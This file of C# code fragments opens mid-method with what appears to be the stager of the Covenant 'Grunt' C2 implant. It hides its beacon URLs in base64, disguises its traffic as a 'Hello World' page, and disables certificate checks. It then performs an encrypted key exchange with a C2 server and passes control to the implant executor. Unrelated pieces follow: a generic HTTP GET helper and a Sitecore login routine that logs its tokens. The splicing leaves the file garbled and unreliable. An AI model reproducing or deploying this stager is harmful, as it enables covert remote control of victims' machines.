List <string> ProfileHttpUrls = @"L2VuLXVzL2luZGV4Lmh0bWw=,L2VuLXVzL2RvY3MuaHRtbA==,L2VuLXVzL3Rlc3QuaHRtbA==".Split(',').ToList().Select(U => System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(U))).ToList();
string ProfileHttpPostRequest = @"i=a19ea23062db990386a3a478cb89d52e&data={0}&session=75db-99b1-25fe4e9afbe58696-320bea73".Replace(Environment.NewLine, "\n");
string ProfileHttpPostResponse = @"<html>
<head>
<title>Hello World!</title>
</head>
<body>
<p>Hello World!</p>
// Hello World! {0}
</body>
</html>".Replace(Environment.NewLine, "\n");
bool ValidateCert = bool.Parse(@"false");
bool UseCertPinning = bool.Parse(@"false");
Random random = new Random();
string aGUID = @"11ac008d1b";
string GUID = Guid.NewGuid().ToString().Replace("-", "").Substring(0, 10);
byte[] SetupKeyBytes = Convert.FromBase64String(@"xaRl3L+AY+sdTONnMv7FNbYqnzmu26xEP6gmGGWTAQQ=");
string MessageFormat = @"{{""GUID"":""{0}"",""Type"":{1},""Meta"":""{2}"",""IV"":""{3}"",""EncryptedMessage"":""{4}"",""HMAC"":""{5}""}}";
Aes SetupAESKey = Aes.Create();
SetupAESKey.Mode = CipherMode.CBC;
SetupAESKey.Padding = PaddingMode.PKCS7;
SetupAESKey.Key = SetupKeyBytes;
SetupAESKey.GenerateIV();
HMACSHA256 hmac = new HMACSHA256(SetupKeyBytes);
RSACryptoServiceProvider rsa = new RSACryptoServiceProvider(2048, new CspParameters());
byte[] RSAPublicKeyBytes = Encoding.UTF8.GetBytes(rsa.ToXmlString(false));
byte[] EncryptedRSAPublicKey = SetupAESKey.CreateEncryptor().TransformFinalBlock(RSAPublicKeyBytes, 0, RSAPublicKeyBytes.Length);
byte[] hash = hmac.ComputeHash(EncryptedRSAPublicKey);
Console.WriteLine("Stage 0");
string Stage0Body = String.Format(MessageFormat, aGUID + GUID, "0", "", Convert.ToBase64String(SetupAESKey.IV), Convert.ToBase64String(EncryptedRSAPublicKey), Convert.ToBase64String(hash));
ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, errors) =>
{
bool valid = true;
if (UseCertPinning && CovenantCertHash != "")
{
valid = cert.GetCertHashString() == CovenantCertHash;
}
if (valid && ValidateCert)
{
valid = errors == System.Net.Security.SslPolicyErrors.None;
}
return(valid);
};
string transformedResponse = MessageTransform.Transform(Encoding.UTF8.GetBytes(Stage0Body));
CookieWebClient wc = null;
string Stage0Response = "";
wc = new CookieWebClient();
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
string CovenantURI = "";
foreach (string uri in CovenantURIs)
{
try
{
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
if (ProfileHttpHeaderNames[i] == "Cookie")
{
wc.SetCookies(new Uri(uri), ProfileHttpHeaderValues[i].Replace(";", ",").Replace("{GUID}", ""));
}
else
{
wc.Headers.Set(ProfileHttpHeaderNames[i].Replace("{GUID}", ""), ProfileHttpHeaderValues[i].Replace("{GUID}", ""));
}
}
wc.DownloadString(uri + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)].Replace("{GUID}", ""));
CovenantURI = uri;
}
catch
{
continue;
}
}
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
if (ProfileHttpHeaderNames[i] == "Cookie")
{
wc.SetCookies(new Uri(CovenantURI), ProfileHttpHeaderValues[i].Replace(";", ",").Replace("{GUID}", GUID));
}
else
{
wc.Headers.Set(ProfileHttpHeaderNames[i].Replace("{GUID}", GUID), ProfileHttpHeaderValues[i].Replace("{GUID}", GUID));
}
}
Stage0Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)].Replace("{GUID}", GUID), String.Format(ProfileHttpPostRequest, transformedResponse));
string extracted = Parse(Stage0Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(MessageTransform.Invert(extracted));
List <string> parsed = Parse(extracted, MessageFormat);
string iv64str = parsed[3];
string message64str = parsed[4];
string hash64str = parsed[5];
byte[] messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SetupAESKey.IV = Convert.FromBase64String(iv64str);
byte[] PartiallyDecrypted = SetupAESKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
byte[] FullyDecrypted = rsa.Decrypt(PartiallyDecrypted, true);
Aes SessionKey = Aes.Create();
SessionKey.Mode = CipherMode.CBC;
SessionKey.Padding = PaddingMode.PKCS7;
SessionKey.Key = FullyDecrypted;
SessionKey.GenerateIV();
hmac = new HMACSHA256(SessionKey.Key);
byte[] challenge1 = new byte[4];
RandomNumberGenerator rng = RandomNumberGenerator.Create();
rng.GetBytes(challenge1);
byte[] EncryptedChallenge1 = SessionKey.CreateEncryptor().TransformFinalBlock(challenge1, 0, challenge1.Length);
hash = hmac.ComputeHash(EncryptedChallenge1);
Console.WriteLine("Stage 1");
string Stage1Body = String.Format(MessageFormat, GUID, "1", "", Convert.ToBase64String(SessionKey.IV), Convert.ToBase64String(EncryptedChallenge1), Convert.ToBase64String(hash));
transformedResponse = MessageTransform.Transform(Encoding.UTF8.GetBytes(Stage1Body));
string Stage1Response = "";
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
if (ProfileHttpHeaderNames[i] == "Cookie")
{
wc.SetCookies(new Uri(CovenantURI), ProfileHttpHeaderValues[i].Replace(";", ",").Replace("{GUID}", GUID));
}
else
{
wc.Headers.Set(ProfileHttpHeaderNames[i].Replace("{GUID}", GUID), ProfileHttpHeaderValues[i].Replace("{GUID}", GUID));
}
}
Stage1Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)].Replace("{GUID}", GUID), String.Format(ProfileHttpPostRequest, transformedResponse));
extracted = Parse(Stage1Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(MessageTransform.Invert(extracted));
parsed = Parse(extracted, MessageFormat);
iv64str = parsed[3];
message64str = parsed[4];
hash64str = parsed[5];
messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SessionKey.IV = Convert.FromBase64String(iv64str);
byte[] DecryptedChallenges = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
byte[] challenge1Test = new byte[4];
byte[] challenge2 = new byte[4];
Buffer.BlockCopy(DecryptedChallenges, 0, challenge1Test, 0, 4);
Buffer.BlockCopy(DecryptedChallenges, 4, challenge2, 0, 4);
if (Convert.ToBase64String(challenge1) != Convert.ToBase64String(challenge1Test))
{
return;
}
SessionKey.GenerateIV();
byte[] EncryptedChallenge2 = SessionKey.CreateEncryptor().TransformFinalBlock(challenge2, 0, challenge2.Length);
hash = hmac.ComputeHash(EncryptedChallenge2);
string Stage2Body = String.Format(MessageFormat, GUID, "2", "", Convert.ToBase64String(SessionKey.IV), Convert.ToBase64String(EncryptedChallenge2), Convert.ToBase64String(hash));
transformedResponse = MessageTransform.Transform(Encoding.UTF8.GetBytes(Stage2Body));
string Stage2Response = "";
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
if (ProfileHttpHeaderNames[i] == "Cookie")
{
wc.SetCookies(new Uri(CovenantURI), ProfileHttpHeaderValues[i].Replace(";", ",").Replace("{GUID}", GUID));
}
else
{
wc.Headers.Set(ProfileHttpHeaderNames[i].Replace("{GUID}", GUID), ProfileHttpHeaderValues[i].Replace("{GUID}", GUID));
}
}
Stage2Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)].Replace("{GUID}", GUID), String.Format(ProfileHttpPostRequest, transformedResponse));
extracted = Parse(Stage2Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(MessageTransform.Invert(extracted));
parsed = Parse(extracted, MessageFormat);
iv64str = parsed[3];
message64str = parsed[4];
hash64str = parsed[5];
messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SessionKey.IV = Convert.FromBase64String(iv64str);
/*byte[] DecryptedAssembly = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
* Assembly gruntAssembly = Assembly.Load(DecryptedAssembly);
* gruntAssembly.GetTypes()[0].GetMethods()[0].Invoke(null, new Object[] { CovenantURI, CovenantCertHash, GUID, SessionKey });*/
GruntExecutor.Grunt.Execute(CovenantURI
, CovenantCertHash
, GUID
, SessionKey
, ProfileHttpHeaderNames
, ProfileHttpHeaderValues
, ProfileHttpUrls
, ProfileHttpPostRequest
, ProfileHttpPostResponse
, ProfileHttpPostResponse
, ValidateCert
, UseCertPinning);
}
catch (Exception e) { Console.Error.WriteLine(e.Message + Environment.NewLine + e.StackTrace); }
}
public string GET(string link, Dictionary <string, object> data = null,
NameValueCollection headers = null, string payloadData = null, string Proxy = "", int downloadDelay = 0)
{
using (var wc = new CookieWebClient())
{
wc.CookieContainer = cookie;
wc.Encoding = Encoding;
if (!string.IsNullOrEmpty(Proxy))
{
WebProxy webProxy = new WebProxy(Proxy, true);
webProxy.UseDefaultCredentials = true;
wc.Proxy = webProxy;
}
if (headers != null)
{
for (int i = 0; i < headers.Count; i++)
{
Sleep(downloadDelay);
switch (headers.GetKey(i).ToLower())
{
case "accept":
wc.Headers.Add(HttpRequestHeader.Accept, headers.Get(i));
break;
case "content-type":
wc.Headers.Add(HttpRequestHeader.ContentType, headers.Get(i));
break;
case "referer":
wc.Headers.Add(HttpRequestHeader.Referer, headers.Get(i));
break;
case "host":
wc.Headers.Add(HttpRequestHeader.Host, headers.Get(i));
break;
case "connection":
if (headers.Get(i) == "keep-alive")
{
wc.Headers.Add(HttpRequestHeader.KeepAlive, "true");
}
else
{
wc.Headers.Add(HttpRequestHeader.Connection, headers.Get(i));
}
break;
case "content-length":
wc.Headers.Add(HttpRequestHeader.ContentLength, headers.Get(i).ToString());
break;
case "user-agent":
wc.Headers.Add(HttpRequestHeader.UserAgent, headers.Get(i));
Console.WriteLine(headers.Get(i));
break;
default:
wc.Headers.Add(headers.GetKey(i), headers.Get(i).ToString());
break;
}
}
}
string dataStr = "";
if (data != null)
{
dataStr = "?" + Func.DictionaryToUrlParam(data);
}
string res = wc.DownloadString(link + dataStr);
ResponseUri = wc.ResponseUri.ToString();
cookie = wc.CookieContainer;
return(res);
}
}
public WebClient GetSitecoreClient(string baseUrl, string idBaseUrl, string user, string password)
{
string uri = string.Format(
"{0}/identity/externallogin?authenticationType=SitecoreIdentityServer&ReturnUrl=%2fidentity%2fexternallogincallback%3fReturnUrl%3d%26sc_site%3dshell%26authenticationSource%3dDefault&sc_site=shell",
baseUrl);
var webClient = new CookieWebClient();
webClient.BaseAddress = baseUrl;
// Disable auto redirect as ID may return an address that will not resolve within Docker network
webClient.AllowAutoRedirect = false;
// Initiate login
webClient.UploadData(uri, new byte[0]);
// Go to /connect/authorize?client_id=Sitecore&response_type=code...
webClient.DownloadString(idBaseUrl + new Uri(webClient.LastResponseHeaders["Location"]).PathAndQuery);
var response = webClient.DownloadString(idBaseUrl + new Uri(webClient.LastResponseHeaders["Location"]).PathAndQuery);
string token = ExtractParameter(response, "__RequestVerificationToken");
string queryString = webClient.LastResponseUri.Query;
var queryDictionary = HttpUtility.ParseQueryString(queryString);
string postData =
$"AccountPrefix=sitecore\\&ReturnUrl={HttpUtility.UrlEncode(queryDictionary["ReturnUrl"])}&__RequestVerificationToken={token}&ActiveTab=&AdvancedOptionsStartUrl=%2Fsitecore%2Fshell%2Fdefault.aspx&Username={user}&Password={password}&button=login&RememberLogin=true";
webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
// Submit a form with user and password. Identity Server returns different Uris depending on host name, that is why such condition.
webClient.UploadData(idBaseUrl + webClient.LastResponseUri.PathAndQuery, "POST", Encoding.ASCII.GetBytes(postData));
if (Uri.TryCreate(webClient.LastResponseHeaders["Location"], UriKind.Absolute, out Uri result))
{
// This fixes weird issues with URL encoding on Linux
response = webClient.DownloadString(idBaseUrl + result.PathAndQuery.Replace("%25", "%").Replace("%3F", "?"));
}
else
{
response = webClient.DownloadString(idBaseUrl + webClient.LastResponseHeaders["Location"]);
}
var signInData =
$"code={ExtractParameter(response, "code")}&id_token={ExtractParameter(response, "id_token")}&access_token={ExtractParameter(response, "access_token")}&token_type={ExtractParameter(response, "token_type")}&expires_in={ExtractParameter(response, "expires_in")}&scope={ExtractParameter(response, "scope")}&state={ExtractParameter(response, "state")}&session_state={ExtractParameter(response, "session_state")}";
webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
logger.LogInformation(signInData);
// Send token to /identity/signin
webClient.UploadData(
baseUrl + "/identity/signin",
"POST",
Encoding.ASCII.GetBytes(signInData));
// Get /externallogincallback?ReturnUrl=&sc_site=shell&authenticationSource=Default
webClient.DownloadString(webClient.LastResponseHeaders["Location"]);
// Test that it worked
response = webClient.DownloadString("/sitecore/shell");
logger.LogInformation(response.Substring(0, 100));
webClient.AllowAutoRedirect = true;
return(webClient);
}